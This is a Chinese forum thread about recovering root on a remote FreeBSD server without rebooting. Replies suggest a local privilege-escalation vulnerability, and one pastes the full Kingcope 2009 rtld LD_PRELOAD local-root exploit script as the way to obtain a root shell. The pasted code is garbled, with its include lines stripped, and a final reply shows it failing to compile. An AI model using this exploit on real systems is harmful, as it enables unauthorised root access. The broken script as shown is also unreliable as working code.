当前位置：文江博客话题详情

操作系统 BSD

只有普通帐号权限，忘记root密码了，怎么办？？？

发布于 2022-10-15 09:08:48 字数 138 浏览 26 评论 0

1、因为服务器现在在外网跑，所以不能重启进入单用户模式，怎么修改root帐号密码？？

2、还有当时设置(不能我弄的)普通账户(wheel组)时，sftp好像没开。现在windows下sftp软件连接不进去，怎么弄啊》。。。

分享到QQ

分享到微博

如果你对这篇内容有疑问，欢迎到本站社区发帖提问参与讨论，获取更多帮助，或者扫码二维码加入 Web 技术交流群。

发布评论

需要登录才能够评论，你可以免费注册一个本站的账号。

千寻… 2022-10-22 09:08:48

貌似没有办法。

回复收藏 0

孤凫 2022-10-22 09:08:48

不是吧，解决方案都没有，那我岂不是只能将外网挂掉。。。

回复收藏 0

拥抱影子 2022-10-22 09:08:48

LZ是什么版本,如果是7.2及其之前版本,可以通过漏洞,来提权到root用户,再修改密码

回复收藏 0

呢古 2022-10-22 09:08:48

LZ是什么版本,如果是7.2及其之前版本,可以通过漏洞,来提权到root用户,再修改密码
beyondfly 发表于 2011-04-19 20:18

回复收藏 0

眼眸 2022-10-22 09:08:48

哈哈本地提权到是不错你有普通帐号可以试试

回复收藏 0

余生再见 2022-10-22 09:08:48

等freebsd有漏洞了你就有希望了

回复收藏 0

分开我的手 2022-10-22 09:08:48

回复 7# lbt5210

FreeBSD老版本有过本地用户提权到root用户的漏洞

回复收藏 0

此岸叶落 2022-10-22 09:08:48

在圣诞节即将到来的日子，以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日(0day)漏洞。据Kingcope所说，他长期致力于挖掘FreeBSD系统的本地提权漏洞，终于有幸在近期发现了这个非常低级的本地提权漏洞;这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中，普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛，包括FreeBSD 7.1至8.0的32及64位系统。

　　在展示该漏洞威力之前，我们科普一下著名黑客kingcope。从2007年6月至今，他一共公开了12个安全漏洞(没公开的不知道有多少)，其中 FreeBSD和Sun Solaris各两个，微软四个，Oracle、mysql、NcFTPD和nginx各一个，同时他还编写了多个漏洞的攻击代码，例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。

　　接下来我们在最新的FreeBSD 8.0中重现一下该漏洞的攻击过程，请注意图中的红色部分;我们只要执行名为fbsd8localroot.sh的脚本，就可以轻易的获得root权限。

20091203103538706.png (20.36 KB, 下载次数: 5)

下载附件

2011-04-20 15:31 上传

　　fbsd8localroot

　　相关脚本如下：

　　#!/bin/sh

　　echo “FreeBSD local r00t zeroday by Kingcope on November 2009″

　　cat > env.c << _EOF

　　#include

　　main() {

　　extern char **environ;

　　environ = (char**)malloc(8096);

　　environ[0] = (char*)malloc(1024);

　　environ[1] = (char*)malloc(1024);

　　strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);

　　execl(”/sbin/ping”, “ping”, 0);

　　}

　　_EOF

　　gcc env.c -o env > /dev/null 2>&1

　　#download from baoz.net

　　cat > program.c << _EOF

　　#include

　　void _init() {

　　extern char **environ;

　　environ=NULL;

　　system(”echo ALEX-ALEX;/bin/sh”);

　　}

　　_EOF

　　gcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./env

　　FreeBSD尚未就该0day漏洞发布安全公告及官方补丁，敬请关注素包子的博客http://baoz.net/freebsd8-localroot-0day/以获取该漏洞的最新情况。

回复收藏 0

蹲墙角沉默 2022-10-22 09:08:48

以上经测试，freebsd 7.0系统不可用，提示以下错误：
FreeBSD local r00t zeroday by Kingcope on November 2009
program.c:1:9: error: #include expects "FILENAME" or <FILENAME>
program.c:2:9: error: #include expects "FILENAME" or <FILENAME>
program.c:3:9: error: #include expects "FILENAME" or <FILENAME>
program.c:4:9: error: #include expects "FILENAME" or <FILENAME>
program.c: In function '_init':
program.c:7: error: 'NULL' undeclared (first use in this function)
program.c:7: error: (Each undeclared identifier is reported only once
program.c:7: error: for each function it appears in.)
gcc: program.o: No such file or directory
cp: w00t.so.1.0: No such file or directory
localroot.sh: ./env: not found

回复收藏 0

~没有更多了~